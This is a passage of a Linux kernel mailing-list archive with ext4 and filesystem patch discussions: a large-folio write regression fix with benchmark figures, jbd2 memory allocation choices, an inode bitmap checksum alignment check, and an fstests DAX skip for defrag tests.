>  fs/nfs/nfs4namespace.c     | 15 +--------------
>  fs/nfs/super.c             |  4 ++--
>  fs/nfsd/vfs.c              |  4 ++--
>  fs/nilfs2/ioctl.c          |  4 ++--
>  fs/ocfs2/dlm/dlmdebug.c    | 24 +++++++++---------------
>  fs/ocfs2/dlm/dlmdomain.c   |  8 +++++---
>  fs/ocfs2/dlm/dlmmaster.c   |  5 ++---
>  fs/ocfs2/dlm/dlmrecovery.c |  4 ++--
>  fs/proc/base.c             | 16 ++++++++--------
>  fs/quota/dquot.c           | 11 +++++------
>  fs/select.c                |  4 ++--
>  20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.


Best Regards,
Yan, Zi

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
  To: Jia Zhu
  Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>

On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
> 
> This was found by our kernel release benchmark.  We run libMicro as part
> of that test suite:
> 
>   https://github.com/rzezeski/libMicro
> 
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.

Makes sense.  I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.

> > Wouldn't you get just as much benefit from this?
> 
> Yes.  I tested this approach, and it gives almost the same result as my
> original partial-commit helper.

Excellent!  Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.

> Agreed.  The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
> 
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
> 
> +       bool folio_uptodate = folio_test_uptodate(folio);
> +
>         for (bh = head, block_start = 0;
> -            bh != head || !block_start;
> +            (bh != head || !block_start) &&
> +            (!folio_uptodate || block_start < to);
>              block++, block_start = block_end, bh = bh->b_this_page) {
>                 ...
>         }

Yes, I think that's a good approach.

> So the prefix path and all in-range handling stay unchanged.  The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
> 
> > ... converting ext4 to use iomap instead of buffer heads.
> 
> I strongly agree that iomap is the right direction for ext4.  The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
> 
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
> by the ext4 large-folio enablement in v6.16.  For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
> 
> case        v6.12        v6.18        regression
> write_u1k   0.609        4.659        +665.0%
> write_u10k  1.408        4.869        +245.8%

Ouch ;-)  No wonder you want to address this.  Do you recover all the
regression with this fix?

> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path.  I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.

Is it that you're using some ext4 features that aren't supported by
iomap yet?  Could you say which ones?  That might motivate someone to
prioritise that support.

> Would this v2 direction look OK to you?

Absolutely.  Very happy with this approach.

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05  9:50 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
> 
I assume you mean kvmalloc()? kvalloc() is something unknown to me.

--
Uladzislau Rezki

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05  9:02 UTC (permalink / raw)
  To: Matthew Wilcox
  Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>

On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?

This was found by our kernel release benchmark.  We run libMicro as part
of that test suite:

  https://github.com/rzezeski/libMicro

The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.

> Wouldn't you get just as much benefit from this?

Yes.  I tested this approach, and it gives almost the same result as my
original partial-commit helper.

I agree this is a better direction for block_commit_write().  It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to.  That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.

> I'm unconvinced that this is safe ...

Agreed.  The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.

For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
uptodate on entry, similar to your block_commit_write() suggestion:

+       bool folio_uptodate = folio_test_uptodate(folio);
+
        for (bh = head, block_start = 0;
-            bh != head || !block_start;
+            (bh != head || !block_start) &&
+            (!folio_uptodate || block_start < to);
             block++, block_start = block_end, bh = bh->b_this_page) {
                ...
        }

So the prefix path and all in-range handling stay unchanged.  The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.
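
To make the effect of the extra loop condition concrete, here is a rough
userspace model of the walk.  It is a sketch only: struct toy_bh and
toy_walk() are hypothetical, the ring merely imitates the b_this_page
linkage, and the 512-buffer limit assumes a 2 MB folio with 4 KB blocks,
which is an illustrative choice rather than a measured configuration.
The loop header is the one proposed above, minus the block counter.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical miniature of a buffer_head ring; not the kernel type. */
struct toy_bh {
	struct toy_bh *b_this_page;	/* next buffer in the circular list */
};

#define TOY_MAX_BH 512	/* assumption: 2 MB folio / 4 KB blocks */

/*
 * Link nr buffers into a ring, walk them with the proposed condition,
 * and return how many buffers the loop body visits.
 */
static unsigned int toy_walk(unsigned int nr, unsigned int blocksize,
			     unsigned int to, bool folio_uptodate)
{
	struct toy_bh ring[TOY_MAX_BH];
	struct toy_bh *head = &ring[0], *bh;
	unsigned int block_start, block_end = 0, visited = 0;

	assert(nr >= 1 && nr <= TOY_MAX_BH && blocksize > 0);
	for (unsigned int i = 0; i < nr; i++)
		ring[i].b_this_page = &ring[(i + 1) % nr];

	for (bh = head, block_start = 0;
	     (bh != head || !block_start) &&
	     (!folio_uptodate || block_start < to);
	     block_start = block_end, bh = bh->b_this_page) {
		block_end = block_start + blocksize;
		visited++;	/* stands in for the per-buffer work */
	}
	return visited;
}
```

In this model a write ending at byte 1024 of an already-uptodate folio
visits one buffer instead of all 512, while a folio that was not
uptodate on entry is still walked in full.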

> ... converting ext4 to use iomap instead of buffer heads.

I strongly agree that iomap is the right direction for ext4.  The iomap
buffered write path would make this particular buffer-head walk cost go
away.

The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
by the ext4 large-folio enablement in v6.16.  For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:

case        v6.12        v6.18        regression
write_u1k   0.609        4.659        +665.0%
write_u10k  1.408        4.869        +245.8%

The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path.  I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.

Would this v2 direction look OK to you?

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05  8:33 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:

...
> I suppose we could do it with kmalloc() with some flags to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.

-- David

> 
> Thanks,
> 
> 					- Ted
> 


* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05  7:55 UTC (permalink / raw)
  To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>

On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> -	ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> +	ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh).  Their MIT licensed version of make_ext4fs would occasionally
> make file systems whose s_inodes_per_group was not a multiple of 8,
> and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> 					- Ted

Hi Ted,

Thank you for your information and suggestions.

I will send two fix patches to bring the checks in ext4_fill_super()
and e2fsck in line with those in mke2fs.
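
As a small illustration of the problem described in the review, the
sketch below checksums a bitmap over nbits >> 3 bytes and shows which bit
flips go unnoticed.  Everything in it is hypothetical: toy_csum() is a
plain FNV-1a hash standing in for ext4_chksum() (it is not crc32c), and
toy_bitmap_csum(), toy_count_is_aligned() and toy_flip_is_detected() are
names made up for this example.  Only the ">> 3" length and the "& 7"
test are taken from the discussion.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy FNV-1a hash standing in for ext4_chksum(); NOT the real crc32c. */
static uint32_t toy_csum(const uint8_t *buf, size_t len)
{
	uint32_t h = 2166136261u;

	for (size_t i = 0; i < len; i++) {
		h ^= buf[i];
		h *= 16777619u;
	}
	return h;
}

/* Checksum an nbits-bit bitmap over whole bytes only: nbits >> 3. */
static uint32_t toy_bitmap_csum(const uint8_t *bitmap, unsigned int nbits)
{
	return toy_csum(bitmap, nbits >> 3);
}

/* The kind of test being proposed: accept only multiples of 8. */
static bool toy_count_is_aligned(unsigned int nbits)
{
	return (nbits & 7) == 0;
}

/* True if flipping `bit` changes the checksum of an nbits-bit bitmap. */
static bool toy_flip_is_detected(unsigned int nbits, unsigned int bit)
{
	uint8_t bitmap[8] = { 0 };
	uint32_t before, after;

	assert(bit < nbits && nbits <= 8 * sizeof(bitmap));
	before = toy_bitmap_csum(bitmap, nbits);
	bitmap[bit >> 3] ^= (uint8_t)(1u << (bit & 7));
	after = toy_bitmap_csum(bitmap, nbits);
	return before != after;
}
```

With 20 bits per group only the first two bytes are covered, so a flip
of bit 17 is invisible to the checksum; with 24 bits the same flip is
caught.  Rejecting counts where (n & 7) != 0 removes the uncovered tail.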


Thanks,
Baokun


* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05  7:02 UTC (permalink / raw)
  To: Darrick J. Wong
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>

On 04/06/26 8:24 pm, Darrick J. Wong wrote:
> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>>    (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>>   common/defrag | 4 ++++
>>   1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>   
>>   _require_defrag()
>>   {
>> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
> 
> Shouldn't this be:
> 
> 	ext4)
> 		__scratch_uses_fsdax && _notrun "..."
> 		;;
> 
> in the case statement below?
> 
> --D

Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.

I'll send v3 with this change.

> 
>> +        _notrun "ext4 online defrag not supported with DAX"
>> +    fi
>> +
>>       case "$FSTYP" in
>>       xfs)
>>           # xfs_fsr does preallocates, require "falloc"
>> -- 
>> 2.45.1
>>

-- 
Regards,
Disha

